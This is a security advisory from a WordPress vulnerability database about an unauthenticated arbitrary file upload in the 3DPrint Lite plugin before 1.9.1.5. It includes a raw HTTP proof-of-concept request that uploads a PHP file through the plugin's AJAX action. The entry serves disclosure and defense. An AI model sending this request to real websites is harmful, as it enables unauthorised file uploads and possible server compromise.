WordPress Plugin Vulnerabilities

3DPrint Lite < 1.9.1.5 - Unauthenticated Arbitrary File Upload

Description

The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353
Content-Length: 366
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="action"

p3dlite_handle_upload
-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="file"; filename="a.php"
Content-Type: text/php

<?php echo 'Failed'; ?>
-----------------------------54331109111293931601238262353--

Affects Plugins

Plugin icon
3dprint-lite
Fixed in 1.9.1.5

References

CVE
CVE-2021-4436
Exploitdb
50321

Miscellaneous

Original Researcher
Spacehen
Verified
Yes
WPVDB ID
c46ecd0d-a132-4ad6-b936-8acde3a09282

Timeline

Publicly Published
2021-09-23 (about 2 years ago)
Added
2021-09-23 (about 2 years ago)
Last Updated
2024-02-05 (about 3 months ago)

Other

Published
Title
Published
2023-11-20
Title
Theme Editor < 2.8 - Admin+ Arbitrary File Upload
Published
2015-03-09
Title
Wpshop - eCommerce <= 1.3.9.5 - Arbitrary File Upload
Published
2018-12-24
Title
Baggage Freight Shipping Australia 0.1.0 - Unauthenticated Arbitrary File Upload
Published
2014-08-01
Title
Mac Photo Gallery - upload-file.php File Upload
Published
2023-11-01
Title
Drag and Drop Multiple File Upload - Contact Form 7 < 1.3.7.4 - Unauthenticated Arbitrary File Upload